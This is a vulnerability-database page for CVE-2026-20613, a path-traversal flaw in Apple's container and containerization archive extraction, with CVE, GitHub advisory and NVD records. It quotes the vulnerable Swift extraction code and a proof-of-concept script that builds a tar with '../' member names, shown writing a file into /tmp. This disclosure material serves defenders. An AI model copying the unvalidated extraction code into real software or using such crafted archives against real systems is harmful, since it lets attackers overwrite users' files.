Vulnerability-Lookup

CVE-2026-20613 (GCVE-0-2026-20613)

Vulnerability from cvelistv5 – Published: 2026-01-22 23:58 – Updated: 2026-01-23 14:56

Summary

The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0.

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames.

Assigner

apple

References

URL

Tags

https://github.com/apple/containerization/securit…

Impacted products

Vendor

Product

Version

Apple

Container

Affected: unspecified , < 0.7.1 (custom)

Apple

Containerization

Affected: unspecified , < 0.20.1 (custom)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "REQUIRED",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2026-20613",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-23T14:56:08.027445Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-22",
                "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-23T14:56:14.929Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Container",
          "vendor": "Apple",
          "versions": [
            {
              "lessThan": "0.7.1",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        },
        {
          "product": "Containerization",
          "vendor": "Apple",
          "versions": [
            {
              "lessThan": "0.20.1",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames.",
              "lang": "en"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-22T23:58:20.556Z",
        "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c",
        "shortName": "apple"
      },
      "references": [
        {
          "url": "https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c",
    "assignerShortName": "apple",
    "cveId": "CVE-2026-20613",
    "datePublished": "2026-01-22T23:58:20.556Z",
    "dateReserved": "2025-11-11T14:43:07.858Z",
    "dateUpdated": "2026-01-23T14:56:14.929Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-20613\",\"sourceIdentifier\":\"product-security@apple.com\",\"published\":\"2026-01-23T00:15:52.283\",\"lastModified\":\"2026-01-23T15:16:07.070\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3\",\"source\":\"product-security@apple.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-20613\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-23T14:56:08.027445Z\"}}}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-23T14:53:34.718Z\"}}], \"cna\": {\"affected\": [{\"vendor\": \"Apple\", \"product\": \"Container\", \"versions\": [{\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"0.7.1\", \"versionType\": \"custom\"}]}, {\"vendor\": \"Apple\", \"product\": \"Containerization\", \"versions\": [{\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"0.20.1\", \"versionType\": \"custom\"}]}], \"references\": [{\"url\": \"https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"description\": \"The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames.\"}]}], \"providerMetadata\": {\"orgId\": \"286789f9-fbc2-4510-9f9a-43facdede74c\", \"shortName\": \"apple\", \"dateUpdated\": \"2026-01-22T23:58:20.556Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-20613\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-23T14:56:14.929Z\", \"dateReserved\": \"2025-11-11T14:43:07.858Z\", \"assignerOrgId\": \"286789f9-fbc2-4510-9f9a-43facdede74c\", \"datePublished\": \"2026-01-22T23:58:20.556Z\", \"assignerShortName\": \"apple\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-CQ3J-QJ2H-6RV3

Vulnerability from github – Published: 2026-01-22 22:30 – Updated: 2026-01-22 22:30

Summary

Container and Containerization archive extraction does not guard against escapes from extraction base directory.

Details

Summary

The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames.

Details

The code in question is: https://github.com/apple/containerization/blob/main/Sources/ContainerizationArchive/Reader.swift#L180.

    /// Extracts the contents of an archive to the provided directory.
    /// Currently only handles regular files and directories present in the archive.
    public func extractContents(to directory: URL) throws {
        let fm = FileManager.default
        var foundEntry = false
        for (entry, data) in self {
            guard let p = entry.path else { continue }
            foundEntry = true
            let type = entry.fileType
            let target = directory.appending(path: p)
            switch type {
            case .regular:
                try data.write(to: target, options: .atomic)
            case .directory:
                try fm.createDirectory(at: target, withIntermediateDirectories: true)
            case .symbolicLink:
                guard let symlinkTarget = entry.symlinkTarget, let linkTargetURL = URL(string: symlinkTarget, relativeTo: target) else {
                    continue
                }
                try fm.createSymbolicLink(at: target, withDestinationURL: linkTargetURL)
            default:
                continue
            }
            chmod(target.path(), entry.permissions)
            if let owner = entry.owner, let group = entry.group {
                chown(target.path(), owner, group)
            }
        }
        guard foundEntry else {
            throw ArchiveError.failedToExtractArchive("no entries found in archive")
        }
    }

PoC

Sample script make-evil-tar.py:

#! /usr/bin/env python3

import tarfile
import io
import time

tar_path = "evil.tar"

# Content of the file inside the tar
payload = b"pwned\n"

with tarfile.open(tar_path, "w") as tar:
    info = tarfile.TarInfo(
        name="../../../../../../../../../../../tmp/pwned.txt"
    )
    info.size = len(payload)
    info.mtime = int(time.time())
    info.mode = 0o644

    tar.addfile(info, io.BytesIO(payload))

print(f"Created {tar_path}")

% ./make-evil-tar.py
Created evil.tar
% mv evil.tar /tmp
% cd /tmp
% ls pwned.txt
ls: pwned.txt: No such file or directory
% ~/projects/jglogan/containerization/bin/cctl images load -i evil.tar
Error: notFound: "/var/folders/6k/tnyh0vfd07z0f9mr5cg7zs5r0000gn/T/8493984C-33AE-44BB-91BB-AE486F3095FC/oci-layout"
% cat pwned.txt 
pwned

Impact

Affects users of cctl image load in the containerization project, and any projects that depend on containerization and use the extractContent() function.

Affects users of container image load in the container project.

These operations can extract a file into any user-writable location on the system using carefully chosen pathnames. This advisory is not a privilege escalation, the affected files can only be written to already user-writable locations.

Severity ?

1.9 (Low)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.20.1"
      },
      "package": {
        "ecosystem": "SwiftURL",
        "name": "github.com/apple/containerization"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.21.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.7.1"
      },
      "package": {
        "ecosystem": "SwiftURL",
        "name": "github.com/apple/container"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-20613"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-22T22:30:05Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "### Summary\nThe `ArchiveReader.extractContents()` function used by `cctl image load` and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames.\n\n### Details\n\nThe code in question is: https://github.com/apple/containerization/blob/main/Sources/ContainerizationArchive/Reader.swift#L180.\n\n```swift\n    /// Extracts the contents of an archive to the provided directory.\n    /// Currently only handles regular files and directories present in the archive.\n    public func extractContents(to directory: URL) throws {\n        let fm = FileManager.default\n        var foundEntry = false\n        for (entry, data) in self {\n            guard let p = entry.path else { continue }\n            foundEntry = true\n            let type = entry.fileType\n            let target = directory.appending(path: p)\n            switch type {\n            case .regular:\n                try data.write(to: target, options: .atomic)\n            case .directory:\n                try fm.createDirectory(at: target, withIntermediateDirectories: true)\n            case .symbolicLink:\n                guard let symlinkTarget = entry.symlinkTarget, let linkTargetURL = URL(string: symlinkTarget, relativeTo: target) else {\n                    continue\n                }\n                try fm.createSymbolicLink(at: target, withDestinationURL: linkTargetURL)\n            default:\n                continue\n            }\n            chmod(target.path(), entry.permissions)\n            if let owner = entry.owner, let group = entry.group {\n                chown(target.path(), owner, group)\n            }\n        }\n        guard foundEntry else {\n            throw ArchiveError.failedToExtractArchive(\"no entries found in archive\")\n        }\n    }\n```\n\n### PoC\n\nSample script `make-evil-tar.py`:\n\n```python\n#! /usr/bin/env python3\n\nimport tarfile\nimport io\nimport time\n\ntar_path = \"evil.tar\"\n\n# Content of the file inside the tar\npayload = b\"pwned\\n\"\n\nwith tarfile.open(tar_path, \"w\") as tar:\n    info = tarfile.TarInfo(\n        name=\"../../../../../../../../../../../tmp/pwned.txt\"\n    )\n    info.size = len(payload)\n    info.mtime = int(time.time())\n    info.mode = 0o644\n\n    tar.addfile(info, io.BytesIO(payload))\n\nprint(f\"Created {tar_path}\")\n```\n\n\n```console\n% ./make-evil-tar.py\nCreated evil.tar\n% mv evil.tar /tmp\n% cd /tmp\n% ls pwned.txt\nls: pwned.txt: No such file or directory\n% ~/projects/jglogan/containerization/bin/cctl images load -i evil.tar\nError: notFound: \"/var/folders/6k/tnyh0vfd07z0f9mr5cg7zs5r0000gn/T/8493984C-33AE-44BB-91BB-AE486F3095FC/oci-layout\"\n% cat pwned.txt \npwned\n```\n\n### Impact\n\nAffects users of `cctl image load` in the containerization project, and any projects that depend on containerization and use the `extractContent()` function.\n\nAffects users of `container image load` in the container project.\n\nThese operations can extract a file into any user-writable location on the system using carefully chosen pathnames. This advisory is **not** a privilege escalation, the affected files can only be written to already user-writable locations.",
  "id": "GHSA-cq3j-qj2h-6rv3",
  "modified": "2026-01-22T22:30:05Z",
  "published": "2026-01-22T22:30:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apple/containerization/commit/3e93416b9a6d7b4c25fff7e9dea22a9ca687ee52"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apple/containerization"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Container and Containerization archive extraction does not guard against escapes from extraction base directory."
}

FKIE_CVE-2026-20613

Vulnerability from fkie_nvd - Published: 2026-01-23 00:15 - Updated: 2026-01-23 15:16

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	product-security@apple.com	https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0."
    }
  ],
  "id": "CVE-2026-20613",
  "lastModified": "2026-01-23T15:16:07.070",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-23T00:15:52.283",
  "references": [
    {
      "source": "product-security@apple.com",
      "url": "https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3"
    }
  ],
  "sourceIdentifier": "product-security@apple.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-20613 (GCVE-0-2026-20613)

GHSA-CQ3J-QJ2H-6RV3

Summary

Details

PoC

Impact

FKIE_CVE-2026-20613

Tags

Sightings

Nomenclature